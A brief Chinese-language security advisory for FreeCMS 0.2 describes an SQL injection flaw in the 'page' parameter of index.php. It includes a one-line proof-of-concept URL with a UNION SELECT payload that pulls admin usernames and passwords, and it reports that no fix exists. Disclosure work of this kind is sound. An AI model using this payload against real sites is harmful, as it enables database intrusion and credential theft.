FreeCMS.us FreeCMS 0.2

　　描述:

　　BUGTRAQ ID: 29773

　　CNCAN ID：CNCAN-2008061903

　　FreeCMS是一款基于PHP的WEB应用程序。

　　FreeCMS不正确处理用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，可能获得敏感信息或操作数据库。

　　问题是’index.php’脚本对用户提交给’page’参数缺少过滤，构建恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。

　　<* 参考:

漏洞提供者

Mr.SQL <　　漏洞提供者

　　Mr.SQL

　　*>

　　测试方法:

　　[警 告]

　　以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

　　http://www.example.com/index.php?page=-28+union+select+concat_ws(0x3a,admin,password)+from+admin/*

　　建议:

　　目前没有解决方案提供：

　　http://www.freecms.us/